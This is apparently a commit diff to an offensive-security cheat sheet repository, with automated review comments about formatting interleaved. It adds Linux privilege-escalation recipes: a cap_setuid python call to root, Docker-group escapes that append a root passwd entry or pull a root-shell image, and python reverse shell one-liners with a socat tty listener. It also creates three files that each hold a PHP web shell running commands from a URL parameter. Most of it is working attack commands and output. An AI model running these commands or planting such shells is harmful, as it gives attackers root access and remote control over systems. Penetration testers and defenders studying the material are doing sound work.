Linux capabilities - setuid + read / Docker group privesc

Swissky 2019-02-26 17:24:10 +01:00
parent abb81aba7e
commit a58a8113d1
6 changed files with 75 additions and 23 deletions

View File

@ -493,6 +493,10 @@ You need a shell on a user account with a mailbox.
python secretsdump.py xxxxxxxxxx -just-dc
```
Alternatively you can use the Metasploit module
[`use auxiliary/scanner/http/exchange_web_server_pushsubscription`](https://github.com/rapid7/metasploit-framework/pull/11420)
## Privilege Escalation
### PrivEsc Local Admin - Token Impersonation (RottenPotato)
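Review bot: the Metasploit reference links to the framework pull request rather than to the module itself; a PR link goes stale once merged, so give the module path (`auxiliary/scanner/http/exchange_web_server_pushsubscription`) on its own or link to the module documentation, and keep the PR only as a secondary reference.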

View File

@ -10,6 +10,15 @@
- [linuxprivchecker.py - a Linux Privilege Escalation Check Script](https://gist.github.com/sh1n0b1/e2e1a5f63fbec3706123)
- [unix-privesc-check - Automatically exported from code.google.com/p/unix-privesc-check](https://github.com/pentestmonkey/unix-privesc-check)
## Summary
* [Checklist](#checklist)
* [SUID](#suid)
* [Capabilities](#capabilities)
* [SUDO](#sudo)
* [Groups](#groups)
* [Docker](#docker)
## Checklists
* Kernel and distribution release details
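Review bot: the new Summary entry `[Checklist](#checklist)` will not resolve, because the heading two lines below is `## Checklists`; rename one of them (for example `* [Checklists](#checklists)`) so the anchor matches. A blank line between the tool list and `## Summary` would also keep the heading from being swallowed into the preceding list by stricter renderers.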
@ -111,7 +120,7 @@ sudo chmod +s /tmp/suid # setuid bit
```
## Capabilies
## Capabilities
List capabilities of binaries
```bash
@ -126,12 +135,29 @@ List capabilities of binaries
/usr/bin/rcp = cap_net_bind_service+ep
```
Edit capabilites
Edit capabilities
```powershell
/sbin/setcap -r /bin/ping # remove
setcap cap_net_raw+p /bin/ping # add
```
Interesting capabilities
```powershell
cap_dac_read_search # read anything
cap_setuid+ep # setuid
```
Example of privilege escalation with `cap_setuid+ep`
```powershell
$ sudo setcap cap_setuid+ep /usr/bin/python2.7
$ python2.7 -c 'import os; os.setuid(0); os.system("/bin/sh")'
sh-5.0# id
uid=0(root) gid=1000(swissky)
```
## SUDO
Sudo configuration might allow a user to execute some command with another user privileges without knowing the password.
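Review bot: the three new fences in this hunk are tagged `powershell` although they hold Linux commands and shell output; use `bash`, as the `getcap` block above already does, so highlighting and the `$`/`#` prompts render correctly. In the "Interesting capabilities" block, `cap_dac_read_search # read anything` deserves one sentence: it bypasses discretionary read and directory-search permission checks, so any binary carrying it should be treated as sensitive as a setuid-root one when auditing `getcap` output. In the `cap_setuid+ep` example, say explicitly that the `sudo setcap ...` line reproduces the misconfiguration and is not part of the escalation, otherwise readers may take the whole block as one sequence.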
@ -178,7 +204,30 @@ $> docker run -it --rm -v $PWD:/mnt bash
$> echo 'toor:$1$.ZcF5ts0$i4k6rQYzeegUkacRCvfxC0:0:0:root:/root:/bin/sh' >> /mnt/etc/passwd
```
Or use the following docker image from [chrisfosterelli](https://hub.docker.com/r/chrisfosterelli/rootplease/) to spawn a root shell
```powershell
$ docker run -v /:/hostOS -i -t chrisfosterelli/rootplease
latest: Pulling from chrisfosterelli/rootplease
2de59b831a23: Pull complete
354c3661655e: Pull complete
91930878a2d7: Pull complete
a3ed95caeb02: Pull complete
489b110c54dc: Pull complete
Digest: sha256:07f8453356eb965731dd400e056504084f25705921df25e78b68ce3908ce52c0
Status: Downloaded newer image for chrisfosterelli/rootplease:latest
You should now have a root shell on the host OS
Press Ctrl-D to exit the docker instance / shell
sh-5.0# id
uid=0(root) gid=0(root) groups=0(root)
```
## References
- [SUID vs Capabilities - Dec 7, 2017 - Nick Void aka mn3m](https://mn3m.info/posts/suid-vs-capabilities/)
- [SUID vs Capabilities - Dec 7, 2017 - Nick Void aka mn3m](https://mn3m.info/posts/suid-vs-capabilities/)
- [Privilege escalation via Docker - April 22, 2015 — Chris Foster](https://fosterelli.co/privilege-escalation-via-docker.html)
- [An Interesting Privilege Escalation vector (getcap/setcap) - NXNJZ AUGUST 21, 2018](https://nxnjz.net/2018/08/an-interesting-privilege-escalation-vector-getcap/)
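Review bot: the reference `SUID vs Capabilities - Dec 7, 2017 - Nick Void aka mn3m` is listed twice in a row; drop one copy. The docker session is tagged `powershell` for a Linux shell; `bash` fits. The image-pull progress lines (`2de59b831a23: Pull complete` and friends) add nothing to the example; keeping the `docker run` line and the `id` output makes the point more readably. Since both examples work by bind-mounting the host filesystem into a container, one sentence stating that membership in the `docker` group is therefore root-equivalent would give defenders the takeaway the section implies but never states.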

View File

@ -36,6 +36,11 @@ perl -MIO -e '$c=new IO::Socket::INET(PeerAddr,"[IPADDR]:[PORT]");STDIN->fdopen(
Linux only
IPv4
```python
export RHOST="127.0.0.1";export RPORT=12345;python -c 'import sys,socket,os,pty;s=socket.socket();s.connect((os.getenv("RHOST"),int(os.getenv("RPORT"))));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn("/bin/sh")'
```
IPv4
```python
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("127.0.0.1",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("/bin/bash")'
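Review bot: the new block is tagged `python` but is a shell command line (`export RHOST=...;export RPORT=...;python -c '...'`), so the fence should be `bash`, with the one-liner's own quoting untouched. Two consecutive `IPv4` labels do not tell the reader how the variants differ; label them by what changes (environment-variable driven versus hard-coded address and port), or keep only one.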
@ -186,20 +191,6 @@ Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();Socket s=new
## Spawn TTY
```bash
/bin/sh -i
```
(From an interpreter)
```powershell
python -c 'import pty; pty.spawn("/bin/sh")'
perl -e 'exec "/bin/sh";'
perl: exec "/bin/sh";
ruby: exec "/bin/sh"
lua: os.execute('/bin/sh')
```
Access shortcuts, su, nano and autocomplete in a partially tty shell
/!\ OhMyZSH might break this trick, a simple `sh` is recommended
@ -216,19 +207,24 @@ export TERM=xterm-256color
stty rows <num> columns <cols>
```
(From within vi)
or use `socat` binary to get a fully tty reverse shell
```bash
:!bash
:set shell=/bin/bash:shell
socat file:`tty`,raw,echo=0 tcp-listen:12345
```
(From within nmap)
Spawn a TTY shell from an interpreter
```sh
!sh
```powershell
/bin/sh -i
python -c 'import pty; pty.spawn("/bin/sh")'
perl -e 'exec "/bin/sh";'
perl: exec "/bin/sh";
ruby: exec "/bin/sh"
lua: os.execute('/bin/sh')
```
## References
* [Reverse Bash Shell One Liner](https://security.stackexchange.com/questions/166643/reverse-bash-shell-one-liner)
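Review bot: in the re-added interpreter block, `perl -e 'exec "/bin/sh";'` and `perl: exec "/bin/sh";` state the same thing in two notations, and the `perl:`/`ruby:`/`lua:` entries follow a "language: snippet" convention while `/bin/sh -i` and the python line are literal commands; pick one convention (literal invocations, e.g. `ruby -e 'exec "/bin/sh"'`) so every line is paste-ready. The fence is again `powershell` where `bash` is meant. Check that the nmap `!sh` block still closes before the new "Spawn a TTY shell from an interpreter" fence; in this view ```` ```sh ```` / `!sh` runs straight into ```` ```powershell ````. The `socat file:\`tty\`,raw,echo=0 tcp-listen:12345` line should also say which side runs it (it is the listener), since it sits between the vi examples and the nmap one.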

View File

@ -0,0 +1 @@
<?php echo "Shell";system($_GET['cmd']); ?>
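Review bot: this one-liner is added byte-for-byte as three separate new files in the same commit; a single copy that the other locations link to avoids the three drifting apart. Files matching `system($_GET[...])` are also commonly signatured by antivirus, so clones of the repository may have them quarantined; a short note in the README about that would save users confusion.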

View File

@ -0,0 +1 @@
<?php echo "Shell";system($_GET['cmd']); ?>

View File

@ -0,0 +1 @@
<?php echo "Shell";system($_GET['cmd']); ?>